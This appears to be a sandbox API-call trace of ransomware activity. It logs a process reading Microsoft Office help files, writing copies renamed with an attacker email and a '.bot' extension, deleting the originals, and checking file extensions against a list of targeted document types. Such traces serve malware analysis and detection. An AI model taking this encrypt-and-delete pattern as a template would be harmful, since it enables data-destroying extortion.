	[0149.516] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.516] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.520] GetLastError () returned 0x0
	[0149.520] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x28b, lpOverlapped=0x0) returned 1
	[0149.597] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0149.598] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.598] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0149.598] SetEndOfFile (hFile=0x2a0) returned 1
	[0149.598] CloseHandle (hObject=0x2a0) returned 1
	[0149.598] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.598] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.600] CloseHandle (hObject=0x3f0) returned 1
	[0149.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.600] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc")) returned 1
	[0149.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.601] lstrlenW (lpString=".doc") returned 4
	[0149.601] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.601] lstrlenW (lpString=".docx") returned 5
	[0149.601] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.601] lstrlenW (lpString=".pdf") returned 4
	[0149.601] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.601] lstrlenW (lpString=".xls") returned 4
	[0149.601] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString=".xlsx") returned 5
	[0149.602] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.602] lstrlenW (lpString=".ppt") returned 4
	[0149.602] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString=".zip") returned 4
	[0149.602] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString=".rar") returned 4
	[0149.602] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString=".bz2") returned 4
	[0149.602] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.602] lstrlenW (lpString=".7z") returned 3
	[0149.602] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString=".dbf") returned 4
	[0149.602] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString=".1cd") returned 4
	[0149.602] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString=".jpg") returned 4
	[0149.602] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.602] lstrlenW (lpString=".doc") returned 4
	[0149.602] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.602] lstrlenW (lpString=".docx") returned 5
	[0149.602] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.602] lstrlenW (lpString=".pdf") returned 4
	[0149.602] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.602] lstrlenW (lpString=".xls") returned 4
	[0149.604] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.604] lstrlenW (lpString=".xlsx") returned 5
	[0149.604] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.604] lstrlenW (lpString=".ppt") returned 4
	[0149.604] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.604] lstrlenW (lpString=".zip") returned 4
	[0149.604] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.604] lstrlenW (lpString=".rar") returned 4
	[0149.604] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.604] lstrlenW (lpString=".bz2") returned 4
	[0149.604] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.604] lstrlenW (lpString=".7z") returned 3
	[0149.604] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.604] lstrlenW (lpString=".dbf") returned 4
	[0149.604] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.604] lstrlenW (lpString=".1cd") returned 4
	[0149.604] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC") returned 67
	[0149.604] lstrlenW (lpString=".jpg") returned 4
	[0149.604] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.604] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0149.604] lstrlenW (lpString="OUTLOOK.HXS") returned 11
	[0149.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.605] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=5000295) returned 1
	[0149.605] CloseHandle (hObject=0x3f0) returned 1
	[0149.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs")) returned 0x20
	[0149.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.606] lstrlenW (lpString=".doc") returned 4
	[0149.606] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.606] lstrlenW (lpString=".docx") returned 5
	[0149.606] lstrcmpiW (lpString1=".docx", lpString2="K.HXS") returned -1
	[0149.606] lstrlenW (lpString=".pdf") returned 4
	[0149.606] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.606] lstrlenW (lpString=".xls") returned 4
	[0149.606] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.606] lstrlenW (lpString=".xlsx") returned 5
	[0149.606] lstrcmpiW (lpString1=".xlsx", lpString2="K.HXS") returned -1
	[0149.606] lstrlenW (lpString=".ppt") returned 4
	[0149.606] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.606] lstrlenW (lpString=".zip") returned 4
	[0149.606] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.606] lstrlenW (lpString=".rar") returned 4
	[0149.606] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.606] lstrlenW (lpString=".bz2") returned 4
	[0149.606] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.606] lstrlenW (lpString=".7z") returned 3
	[0149.606] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.606] lstrlenW (lpString=".dbf") returned 4
	[0149.606] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString=".1cd") returned 4
	[0149.607] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString=".jpg") returned 4
	[0149.607] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString=".doc") returned 4
	[0149.607] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.607] lstrlenW (lpString=".docx") returned 5
	[0149.607] lstrcmpiW (lpString1=".docx", lpString2="K.HXS") returned -1
	[0149.607] lstrlenW (lpString=".pdf") returned 4
	[0149.607] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString=".xls") returned 4
	[0149.607] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString=".xlsx") returned 5
	[0149.607] lstrcmpiW (lpString1=".xlsx", lpString2="K.HXS") returned -1
	[0149.607] lstrlenW (lpString=".ppt") returned 4
	[0149.607] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString=".zip") returned 4
	[0149.607] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString=".rar") returned 4
	[0149.607] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.607] lstrlenW (lpString=".bz2") returned 4
	[0149.607] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.607] lstrlenW (lpString=".7z") returned 3
	[0149.607] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.607] lstrlenW (lpString=".dbf") returned 4
	[0149.608] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.608] lstrlenW (lpString=".1cd") returned 4
	[0149.608] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.HXS") returned 59
	[0149.608] lstrlenW (lpString=".jpg") returned 4
	[0149.608] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.608] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0149.608] lstrlenW (lpString="OUTLOOK_COL.HXC") returned 15
	[0149.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.608] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=631) returned 1
	[0149.608] CloseHandle (hObject=0x3f0) returned 1
	[0149.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc")) returned 0x20
	[0149.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.609] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.609] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.610] GetLastError () returned 0x0
	[0149.610] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x277, lpOverlapped=0x0) returned 1
	[0149.625] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0149.626] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.626] WriteFile (in: hFile=0x2a0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0149.626] SetEndOfFile (hFile=0x2a0) returned 1
	[0149.626] CloseHandle (hObject=0x2a0) returned 1
	[0149.627] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.627] SetEndOfFile (hFile=0x3f0) returned 1
	[0149.629] CloseHandle (hObject=0x3f0) returned 1
	[0149.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxc")) returned 1
	[0149.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.679] lstrlenW (lpString=".doc") returned 4
	[0149.679] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.679] lstrlenW (lpString=".docx") returned 5
	[0149.679] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.679] lstrlenW (lpString=".pdf") returned 4
	[0149.679] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.679] lstrlenW (lpString=".xls") returned 4
	[0149.679] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.679] lstrlenW (lpString=".xlsx") returned 5
	[0149.679] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.679] lstrlenW (lpString=".ppt") returned 4
	[0149.679] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.679] lstrlenW (lpString=".zip") returned 4
	[0149.679] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.679] lstrlenW (lpString=".rar") returned 4
	[0149.679] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.679] lstrlenW (lpString=".bz2") returned 4
	[0149.679] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.680] lstrlenW (lpString=".7z") returned 3
	[0149.680] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString=".dbf") returned 4
	[0149.680] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString=".1cd") returned 4
	[0149.680] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString=".jpg") returned 4
	[0149.680] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString=".doc") returned 4
	[0149.680] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.680] lstrlenW (lpString=".docx") returned 5
	[0149.680] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.680] lstrlenW (lpString=".pdf") returned 4
	[0149.680] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.680] lstrlenW (lpString=".xls") returned 4
	[0149.680] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.680] lstrlenW (lpString=".xlsx") returned 5
	[0149.680] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.680] lstrlenW (lpString=".ppt") returned 4
	[0149.680] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.680] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.680] lstrlenW (lpString=".zip") returned 4
	[0149.680] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.680] lstrlenW (lpString=".rar") returned 4
	[0149.680] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.681] lstrlenW (lpString=".bz2") returned 4
	[0149.681] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.681] lstrlenW (lpString=".7z") returned 3
	[0149.681] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.681] lstrlenW (lpString=".dbf") returned 4
	[0149.681] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.681] lstrlenW (lpString=".1cd") returned 4
	[0149.681] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXC") returned 63
	[0149.681] lstrlenW (lpString=".jpg") returned 4
	[0149.681] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.681] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0149.681] lstrlenW (lpString="OUTLOOK_COL.HXT") returned 15
	[0149.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.684] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=207) returned 1
	[0149.684] CloseHandle (hObject=0x384) returned 1
	[0149.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt")) returned 0x20
	[0149.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.685] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.685] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.685] GetLastError () returned 0x0
	[0149.685] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcf, lpOverlapped=0x0) returned 1
	[0149.686] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0149.687] ReadFile (in: hFile=0x384, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.687] WriteFile (in: hFile=0x3ec, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0149.687] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.687] CloseHandle (hObject=0x3ec) returned 1
	[0149.687] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.688] SetEndOfFile (hFile=0x384) returned 1
	[0149.690] CloseHandle (hObject=0x384) returned 1
	[0149.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.690] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook_col.hxt")) returned 1
	[0149.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK_COL.HXT") returned 63
	[0149.691] lstrlenW (lpString=".doc") returned 4
	[0149.691] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0149.691] lstrlenW (lpString=".docx") returned 5
